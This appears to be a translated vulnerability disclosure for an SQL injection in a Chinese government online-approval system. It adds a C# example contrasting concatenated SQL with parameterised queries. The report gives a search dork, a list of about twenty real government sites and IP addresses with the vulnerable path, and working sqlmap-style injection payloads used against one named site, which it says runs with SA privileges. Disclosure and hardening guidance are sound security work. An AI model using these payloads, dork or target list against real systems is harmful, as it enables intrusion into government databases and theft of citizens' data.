### Brief description:
A generic SQL injection vulnerability in a government affairs system (with numerous government case examples)
### Detailed description:
System developer: 邯郸市连邦软件发展有限公司
System architecture: ASPX + MSSQL
Vulnerable file: workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
The xksxID parameter is not properly filtered, which leads to SQL injection.
Keyword: inurl:workplate
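The root cause the report names (an unfiltered numeric query-string value) is the classic ADO.NET concatenation pattern. The following is an added example written for this page, not code from the vendor's system: the concatenating version that produces this class of bug sits next to a version that validates the type and binds parameters. The table name `spsl`, the column names, the `Spsl` page class and the connection string are assumptions.

```csharp
// Added example, not the vendor's code. Table/column names, the page class
// and the connection string are assumptions made for illustration.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;
using System.Web.UI;

public partial class Spsl : Page
{
    // Hypothetical connection string; in a real site it lives in web.config.
    // Note the dedicated low-privilege login rather than "sa".
    private const string ConnStr =
        "Server=.;Database=xzsp;User Id=xzsp_app;Password=<placeholder>;";

    // VULNERABLE: the raw query-string values are spliced into the SQL text,
    // so a value such as "928 AND 8078=8078" or a subquery is executed as SQL.
    private DataTable LoadVulnerable(string xksxId, string baseOrg)
    {
        string sql = "SELECT * FROM spsl WHERE xksxID=" + xksxId
                   + " AND baseorg=" + baseOrg;
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            var dt = new DataTable();
            da.Fill(dt);   // Fill opens and closes the connection itself
            return dt;
        }
    }

    // HARDENED: reject anything that is not an integer, then bind the values
    // as typed parameters. The input can no longer change the statement's
    // structure, whatever it contains.
    private DataTable LoadSafe(string xksxId, string baseOrg)
    {
        int id, org;
        if (!int.TryParse(xksxId, out id) || !int.TryParse(baseOrg, out org))
            throw new HttpException(400, "Invalid request");

        const string sql = "SELECT * FROM spsl WHERE xksxID=@id AND baseorg=@org";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            cmd.Parameters.Add("@org", SqlDbType.Int).Value = org;
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        DataTable rows = LoadSafe(Request.QueryString["xksxID"],
                                  Request.QueryString["baseorg"]);
        // bind rows to the page's controls here
    }
}
```

The parameterised query removes the injection; the separate application login in the connection string addresses the second finding in this report, that the site's database connection runs with SA rights. An application account that only holds SELECT on the tables it needs limits what even a successful injection elsewhere in the site could reach.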
Some government cases:
Rizhao online approval system
http://www.rzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Baoding online approval system
http://www.bdxzfw.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Ci County online approval system
http://www.cxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Wei County online approval system
http://wxxz.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Handan County online approval system
http://www.hdxzwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Nanjiao District online approval system
http://xz.njqsp.com:8001/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Chengqu District online approval system
http://211.142.37.152:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Zuoyun County online approval system
http://211.142.37.152:88/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Tianzhen County online approval system
http://211.142.37.154:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Guangling County online approval system
http://211.142.37.152:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Xinrong District online approval system
http://183.203.128.238:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Kuangqu District online approval system
http://211.142.41.114:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
She County online approval system
http://www.hbsxxzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Linzhang County online approval system
http://www.lzxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Anxin County online approval system
http://www.axxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Gaoyang County online approval system
http://gyxzfw.net/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Zhangzi County online approval system
http://60.220.253.153:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Tunliu County online approval system
http://60.220.240.7/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Hunyuan County online approval system
http://211.142.37.152:85/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Qiu County online approval system
www.qxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
Datong County online approval system
http://211.142.37.152:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=
and so on.
### Proof of vulnerability:
Verification:
Taking http://www.rzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= as an example:
```
Place: GET
Parameter: xksxID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: xksxID=928 AND 8078=8078&baseorg=209
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
Payload: xksxID=928 AND 1288 IN ((CHAR(58) CHAR(99) CHAR(119) CHAR(122) CHAR(58) (SELECT (CASE WHEN (1288=1288) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(98) CHAR(115) CHAR(109) CHAR(58)))&baseorg=209
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: xksxID=928 AND 2613=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&baseorg=209
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: xksxID=(SELECT CHAR(58) CHAR(99) CHAR(119) CHAR(122) CHAR(58) (SELECT (CASE WHEN (4478=4478) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(98) CHAR(115) CHAR(109) CHAR(58))&baseorg=209
---
```
![11.png](https://images.seebug.org/upload/201506/0921104000627ff11c79d41d5620a414b7432757.png)
SA privileges:
![11.png](https://images.seebug.org/upload/201506/09211232936bc439c7c3de59909e35166bebd788.png)
The other sites are the same as above!